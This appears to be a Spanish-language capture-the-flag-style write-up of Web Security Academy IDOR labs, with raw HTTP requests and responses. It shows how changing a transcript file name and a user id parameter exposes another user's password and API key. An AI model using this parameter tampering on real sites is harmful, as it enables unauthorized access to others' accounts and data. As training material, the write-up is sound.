👦Laboratorio: Referencias directas a objetos inseguros
Esta práctica de laboratorio almacena los registros de chat de los usuarios directamente en el sistema de archivos del servidor y los recupera mediante URL estáticas.
Resuelva la práctica de laboratorio buscando la contraseña del usuario carlose iniciando sesión en su cuenta.
RESOLUCIÓN:
VERIFICAMOS EL PARAMETRO DE DESCARGA DE CHATS DE USUARIO GUARDADOS /download-transcript/1.txt VIENDO QUE LA RESPONSE DE ESA SOLIICITUD NOS TRAE INFORMACION del 2.TXT (System: --- Disconnected --- System: --- Disconnected ---) ASI QUE INTENTAMOS MODIFICAR EL VALOS DEL PARAMETRO PARA BUSACAR UNA POSIBLE VULNERABILIDAD DE IDOR MODIFICANDO EL NOMBRE DEL TXT EN 1.TXT Y OBTUVIMOS EL CHAT DEL EL SUAURIO CARLOS Y BINGO VEMOS SU CONTRASEÑA EN EL CHAT AL QUE NO TENDRIAMOS Q(UE TENER ACCESO, NOS LOGUEAMOS CON SUS CREDENCIALES Y LABORATORIO RESUELTO.
// pyth
---------------------
REQUEST NORMAL:
GET /download-transcript/2.txt HTTP/2
Host: 0a0d005604aac6cf82f06662004900cb.web-security-academy.net
Cookie: session=LZwlXimaOoz4WV0XhoUqCEnoVmwzBlG2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a0d005604aac6cf82f06662004900cb.web-security-academy.net/chat
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
RESPONSE NORMAL:
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="2.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 61
System: --- Disconnected ---<br/>System: --- Disconnected ---
-----------
REQUEST MODIFICANDO NOMBRE DE DOCUMENTO TXT 1:
GET /download-transcript/1.txt HTTP/2
Host: 0a0d005604aac6cf82f06662004900cb.web-security-academy.net
Cookie: session=LZwlXimaOoz4WV0XhoUqCEnoVmwzBlG2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a0d005604aac6cf82f06662004900cb.web-security-academy.net/chat
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
RESPONSE MODIFICANDO NOMBRE DE DOCUMENTO TXT 1:
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="1.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 520
CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is d587wx4vvub1vo3dbf64. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!
----------------
GET /my-account?id=wiener HTTP/2
Host: 0a28001f035e6e2881b6bce500b10065.web-security-academy.net
Cookie: session=QNTnqTALdBRRwCbdWHAmtGMtWi1g7p9y
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a28001f035e6e2881b6bce500b10065.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
RESPONSE NORMAL:
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 3565
<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>User ID controlled by request parameter</title>
</head>
<body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class='academyLabBanner'>
<div class=container>
<div class=logo></div>
<div class=title-container>
<h2>User ID controlled by request parameter </h2>
<button id='submitSolution' class='button' method='POST' path='/submitSolution' parameter='answer' >Submit solution</button>
<script src='/resources/labheader/js/submitSolution.js'></script>
<a class=link-back href='https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter'>
Back to lab description
<svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
<g>
<polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
<polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
</g>
</svg>
</a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'>
<span>LAB</span>
<p>Not solved</p>
<span class=lab-status-icon></span>
</div>
</div>
</div>
</section>
</div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href="/my-account?id=wiener">My account</a><p>|</p>
<a href="/logout">Log out</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<h1>My Account</h1>
<div id=account-content>
<p>Your username is: wiener</p>
<div>Your API Key is: fVFRnawn9ykVtL1bv7KY44vNs9a8sTqJ</div><br/>
<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
<label>Email</label>
<input required type="email" name="email" value="">
<input required type="hidden" name="csrf" value="8RRucqnBIG5cF4D2AihH1Ius0RQRyDng">
<button class='button' type='submit'> Update email </button>
</form>
</div>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
------
REQUEST CON PARAMETRO DE USUARIO CARLOS:
GET /my-account?id=carlos HTTP/2
Host: 0a28001f035e6e2881b6bce500b10065.web-security-academy.net
Cookie: session=QNTnqTALdBRRwCbdWHAmtGMtWi1g7p9y
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a28001f035e6e2881b6bce500b10065.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
RESPONSE CON PARAMETRO DE USUARIO CARLOS:
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 3565
<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>User ID controlled by request parameter</title>
</head>
<body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class='academyLabBanner'>
<div class=container>
<div class=logo></div>
<div class=title-container>
<h2>User ID controlled by request parameter </h2>
<button id='submitSolution' class='button' method='POST' path='/submitSolution' parameter='answer' >Submit solution</button>
<script src='/resources/labheader/js/submitSolution.js'></script>
<a class=link-back href='https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter'>
Back to lab description
<svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
<g>
<polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
<polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
</g>
</svg>
</a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'>
<span>LAB</span>
<p>Not solved</p>
<span class=lab-status-icon></span>
</div>
</div>
</div>
</section>
</div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href="/my-account?id=wiener">My account</a><p>|</p>
<a href="/logout">Log out</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<h1>My Account</h1>
<div id=account-content>
<p>Your username is: carlos</p>
<div>Your API Key is: NmZRGjarw9JsgzOpv7Xnst2WfwcWvqGI</div><br/>
<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
<label>Email</label>
<input required type="email" name="email" value="">
<input required type="hidden" name="csrf" value="8RRucqnBIG5cF4D2AihH1Ius0RQRyDng">
<button class='button' type='submit'> Update email </button>
</form>
</div>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
</body>
</html>
--------Last updated